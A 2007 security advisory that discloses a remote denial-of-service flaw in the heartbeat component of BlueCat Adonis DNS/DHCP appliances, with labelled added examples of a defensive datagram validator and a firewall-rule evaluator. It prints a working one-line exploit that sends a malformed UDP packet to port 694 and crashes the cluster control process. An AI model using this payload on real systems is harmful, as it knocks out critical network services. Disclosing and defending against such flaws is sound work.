
TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

From: anonymous.c7ffa4057a <anonymous.c7ffa4057a(at)anonymousspeech.com>
Date: Sun Jul 29 2007 - 14:32:52 EDT


Template Security Security Advisory


  BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

  Date: 2007-07-29
  Advisory ID: TS-2007-001-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
  Revision: 0

Contents


  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary


  Template Security has discovered a serious Denial of Service
  (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP
  Appliance. When XHA is configured to place two Adonis
  servers in an active-passive pair to provide high
  availability, a remote attacker can transmit a single UDP
  datagram to crash the heartbeat control process. This can
  be used, for example, to create an active/active condition in
  the cluster pair.

Software Version



  Adonis version 5.0.2.8 was tested, and XHA was configured
  using the Proteus IPAM appliance. It is possible any version
  of Adonis using heartbeat version 1.2.4 or earlier is
  vulnerable.

Details


  XHA on Adonis uses the heartbeat software from the Linux-HA
  project (http://www.linux-ha.org/). On the version of
  Adonis we tested, heartbeat version 1.2.3 is used. This
  version is vulnerable to a well-known remote DoS attack
  which was announced on 2006-08-13:

    http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact


  Successful exploitation of the vulnerability will result in
  a DoS condition affecting critical DNS and DHCP services.

Exploit


  In this example the XHA cluster is composed of:

    node-1: 192.168.1.12
    node-2: 192.168.1.13
    VIP:    192.168.1.11

  A remote attacker can perform the following to crash the
  heartbeat control process on node-1:

    $ perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694

  If node-1 is the active node in the cluster, node-2 will
  take over the VIP and the cluster will be in an
  active/active condition. Other scenarios are possible, such
  as crashing the control process on the passive node to
  prevent it from being able to assume the active role in a
  failure condition.
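  The datagram above is a single message whose framing markers
  ("###" and "%%%") enclose a declared length of 2147483647
  bytes inside a packet of a few dozen bytes. The following is
  an added example, not part of the advisory and not code from
  the Linux-HA project: a defensive sanity check that a
  receiver or an IDS sensor watching 694/udp can apply before
  any parser trusts such a number. It ASSUMES that heartbeat
  carries its messages as a netstring list ("<len>:<data>,")
  between those two markers; the sample datagrams are
  constructed, and the second one is the exact payload the
  perl command prints.

```python
import re

# Framing markers seen in the advisory's datagram. ASSUMPTION: heartbeat 1.x
# carries its UDP messages as a netstring list between these markers, i.e.
# "###\n" <len>:<data>, ... "%%%\n". The check below relies only on that
# shape, not on any other detail of the heartbeat wire format.
MSG_START = b"###\n"
MSG_END = b"%%%\n"
LEN_PREFIX = re.compile(rb"\d+")   # decimal length at the start of each element


def check_heartbeat_datagram(payload: bytes):
    """Return (ok, reason) for one UDP/694 payload.

    A datagram is rejected when its framing is wrong, when an element is not
    delimited as "<len>:<data>,", or, most importantly, when a declared length
    is larger than the number of bytes that actually arrived. The advisory's
    datagram declares 2147483647 bytes inside a packet of a few dozen bytes.
    """
    if not payload.startswith(MSG_START):
        return False, "missing ### start marker"
    if len(payload) < len(MSG_START) + len(MSG_END) or not payload.endswith(MSG_END):
        return False, "missing %%% end marker"
    body = payload[len(MSG_START):-len(MSG_END)]
    pos = 0
    while pos < len(body):
        m = LEN_PREFIX.match(body, pos)
        if not m:
            return False, f"no decimal length at offset {pos}"
        declared = int(m.group(0))
        remaining = len(body) - m.end()          # bytes left after the digits
        if declared > remaining:
            return False, f"declared length {declared} exceeds {remaining} bytes present"
        if body[m.end():m.end() + 1] != b":":
            return False, f"length not followed by ':' at offset {m.end()}"
        data_end = m.end() + 1 + declared
        if body[data_end:data_end + 1] != b",":
            return False, f"element not terminated by ',' at offset {data_end}"
        pos = data_end + 1
    return True, "ok"


# Constructed sample datagrams (not captured traffic). The second one is the
# exact payload printed by the advisory's perl command.
SAMPLES = {
    "well-formed": b"###\n5:hello,2:hi,%%%\n",
    "advisory-payload": b"###\n2147483647heart attack:%%%\n",
    "truncated": b"###\n12:short,%%%\n",
    "no-framing": b"not a heartbeat message",
}


def triage(samples=SAMPLES):
    """Run the check over a set of named payloads, as an IDS-style sweep would."""
    return {name: check_heartbeat_datagram(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, (ok, reason) in triage().items():
        print(f"{name:18} {'pass' if ok else 'REJECT'}  {reason}")
```

  The length-versus-bytes-present comparison is done before the
  delimiter checks on purpose: it is the one condition that turns
  a parsing error into a crash, so it is the one worth surfacing
  first in an alert.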

  Note that the iptables configuration on Adonis does not
  block packets to 694/udp; there is an explicit policy to
  permit port 694/udp from any to any in the INPUT and OUTPUT
  chain. To verify this, you can login as root on the
  appliance and view the firewall configuration script:

    # grep 694 /usr/local/bluecat/doFirewall
    iptables -A INPUT -p udp --dport 694 -j ACCEPT
    iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds


  The attack can be prevented by blocking packets to 694/udp.
  This can be performed at a firewall and by modifying the
  iptables configuration on the Adonis appliances.
  Appropriate anti-spoofing policies must also be in place,
  because an attacker can spoof the source IP address in the
  UDP datagram.

  When XHA was configured, iptables rules were configured in
  /usr/local/bluecat/firewall_rules/localHAFirewallConfig to
  permit 694/udp to and from the peer node on each appliance.
  However, these rules have no effect due to the rules
  mentioned above. They are also incorrect because they
  specify source port 694/udp, and the heartbeat packets we
  observed do not use a fixed source port.


  One possible workaround which may be used to temporarily
  prevent the attack is to comment out the 694/udp rules in
  the firewall startup script, then repair the rules in
  localHAFirewallConfig. However, localHAFirewallConfig can
  be overwritten by /usr/local/bluecat/configLocalFirewall.sh.
  Due to this, we recommend that customers do not modify the
  iptables configuration, and block 694/udp and perform
  anti-spoofing at a firewall.
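  The two firewall problems described in this section (a
  blanket accept that shadows the peer-specific rule, and a
  peer rule that wrongly pins the source port) are easy to see
  with a first-match chain evaluator. The following is an added
  example, not part of the advisory and not BlueCat's or the
  Linux-HA project's code. It uses the advisory's node-1 and
  node-2 addresses; the interface names "ha" and "ext", the
  ephemeral source ports and the default DROP policy are
  ASSUMPTIONS made for the example, and the packets are
  constructed, not captured.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# Addresses from the advisory's example cluster. The interface names are an
# ASSUMPTION made for this example: "ha" is the link that carries heartbeat
# between the two nodes, "ext" faces everything else.
NODE1 = "192.168.1.12"
PEER = "192.168.1.13"
HA_IFACE, EXT_IFACE = "ha", "ext"


@dataclass(frozen=True)
class Rule:
    """One INPUT rule: every set field must match, like -s / -i / --sport / --dport."""
    target: str
    src: str = "0.0.0.0/0"
    in_iface: Optional[str] = None
    sport: Optional[int] = None
    dport: Optional[int] = None

    def matches(self, pkt: dict) -> bool:
        return (ip_address(pkt["src"]) in ip_network(self.src)
                and (self.in_iface is None or pkt["iface"] == self.in_iface)
                and (self.sport is None or pkt["sport"] == self.sport)
                and (self.dport is None or pkt["dport"] == self.dport))


def verdict(chain, pkt, policy="DROP"):
    """First-match evaluation of a chain, which is how iptables walks INPUT.
    A DROP chain policy is assumed for this example."""
    for rule in chain:
        if rule.matches(pkt):
            return rule.target
    return policy


CHAINS = {
    # doFirewall's blanket rule comes first; the peer-specific rule from
    # localHAFirewallConfig (with its --sport 694) sits behind it and is
    # never reached.
    "as-shipped": [
        Rule("ACCEPT", dport=694),
        Rule("ACCEPT", src=PEER, sport=694, dport=694),
    ],
    # What the localHAFirewallConfig rule would do on its own: it still
    # demands source port 694, which the observed heartbeat traffic does
    # not use, so it would cut off the real peer.
    "ha-config-alone": [
        Rule("ACCEPT", src=PEER, sport=694, dport=694),
    ],
    # Corrected shape: match the peer address on the HA interface only
    # (the anti-spoofing part), leave the source port alone, and drop
    # everything else bound for 694/udp.
    "corrected": [
        Rule("ACCEPT", src=PEER, in_iface=HA_IFACE, dport=694),
        Rule("DROP", dport=694),
    ],
}

# Constructed packets (not captures). Source ports are ephemeral, matching
# the advisory's observation that heartbeat does not use a fixed one.
PACKETS = {
    "peer-heartbeat": {"src": PEER, "iface": HA_IFACE, "sport": 32801, "dport": 694},
    "attacker": {"src": "10.0.0.5", "iface": EXT_IFACE, "sport": 40000, "dport": 694},
    "spoofed-peer": {"src": PEER, "iface": EXT_IFACE, "sport": 40000, "dport": 694},
}


def evaluate(chains=CHAINS, packets=PACKETS):
    """Verdict of every chain for every packet: {chain: {packet: ACCEPT|DROP}}."""
    return {name: {pname: verdict(chain, pkt) for pname, pkt in packets.items()}
            for name, chain in chains.items()}


def protects_cluster(results: dict) -> bool:
    """True only if the peer's heartbeat gets through and nothing else does."""
    return (results["peer-heartbeat"] == "ACCEPT"
            and results["attacker"] == "DROP"
            and results["spoofed-peer"] == "DROP")


if __name__ == "__main__":
    for name, results in evaluate().items():
        status = "protects" if protects_cluster(results) else "FAILS"
        print(f"{name:16} {status:9} {results}")
```

  The "as-shipped" chain accepts all three packets, the peer
  rule on its own drops the genuine heartbeat along with the
  attacker, and only the corrected chain admits the peer while
  dropping both the attacker and the packet that spoofs the
  peer's address from the wrong interface. The same three
  checks are what to run against the external firewall rules
  the advisory recommends instead of editing the appliance.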

Obtaining Patched Software


  Contact the vendor.

Credits


  forloop discovered that Adonis XHA was using vulnerable
  heartbeat software, and defaultroute read the heartbeat code
  to discover the exploit. Both are members of Template
  Security.

Revision History


  2007-07-29: Revision 0 released

Received on Mon Jul 30 11:48:04 2007

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:26 EDT
